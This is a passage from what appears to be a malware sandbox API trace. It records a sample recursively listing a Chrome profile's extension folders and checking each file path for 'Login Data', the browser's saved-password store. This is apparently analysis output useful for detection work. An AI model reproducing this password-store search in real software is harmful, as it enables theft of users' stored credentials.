Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0161.530] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.530] GetProcessHeap () returned 0x8e0000 [0161.530] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 137 [0161.530] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 137 [0161.530] lstrlenW (lpString="\\*.*") returned 4 [0161.530] GetProcessHeap () returned 0x8e0000 [0161.530] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0161.530] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*" [0161.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.531] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.531] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.531] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.531] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.531] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.531] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned 137 [0161.531] lstrlenW (lpString="\\") returned 1 [0161.531] GetProcessHeap () returned 0x8e0000 [0161.531] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.531] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da" [0161.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\" [0161.531] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\") returned 138 [0161.531] lstrlenW (lpString="messages.json") returned 13 [0161.531] GetProcessHeap () returned 0x8e0000 [0161.531] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.531] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\" [0161.531] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json" [0161.531] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.531] GetProcessHeap () returned 0x8e0000 [0161.531] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.531] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\da\\messages.json", lpSrch="Login Data") returned 0x0 [0161.531] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.532] GetProcessHeap () returned 0x8e0000 [0161.532] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.532] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.532] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.532] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.532] GetProcessHeap () returned 0x8e0000 [0161.532] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.532] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.532] GetProcessHeap () returned 0x8e0000 [0161.532] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.532] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="de", cAlternateFileName="")) returned 1 [0161.532] lstrcmpiW (lpString1="de", lpString2=".") returned 1 [0161.532] lstrcmpiW (lpString1="de", lpString2="..") returned 1 [0161.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.532] lstrlenW (lpString="\\") returned 1 [0161.532] GetProcessHeap () returned 0x8e0000 [0161.532] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.532] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.532] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.532] lstrlenW (lpString="de") returned 2 [0161.532] GetProcessHeap () returned 0x8e0000 [0161.532] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.532] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.532] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0161.532] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.532] GetProcessHeap () returned 0x8e0000 [0161.532] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 137 [0161.532] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 137 [0161.532] lstrlenW (lpString="\\*.*") returned 4 [0161.532] GetProcessHeap () returned 0x8e0000 [0161.533] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.533] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0161.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*" [0161.533] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.533] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.533] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.533] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.533] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.533] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.533] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned 137 [0161.533] lstrlenW (lpString="\\") returned 1 [0161.533] GetProcessHeap () returned 0x8e0000 [0161.533] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.533] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de" [0161.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\" [0161.533] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\") returned 138 [0161.533] lstrlenW (lpString="messages.json") returned 13 [0161.533] GetProcessHeap () returned 0x8e0000 [0161.533] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.533] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\" [0161.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" [0161.533] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.533] GetProcessHeap () returned 0x8e0000 [0161.533] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.533] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", lpSrch="Login Data") returned 0x0 [0161.533] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.534] GetProcessHeap () returned 0x8e0000 [0161.534] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.534] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xea, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.534] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.534] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.534] GetProcessHeap () returned 0x8e0000 [0161.534] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.534] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.534] GetProcessHeap () returned 0x8e0000 [0161.534] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.534] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="el", cAlternateFileName="")) returned 1 [0161.534] lstrcmpiW (lpString1="el", lpString2=".") returned 1 [0161.534] lstrcmpiW (lpString1="el", lpString2="..") returned 1 [0161.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.534] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.534] lstrlenW (lpString="\\") returned 1 [0161.534] GetProcessHeap () returned 0x8e0000 [0161.534] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS 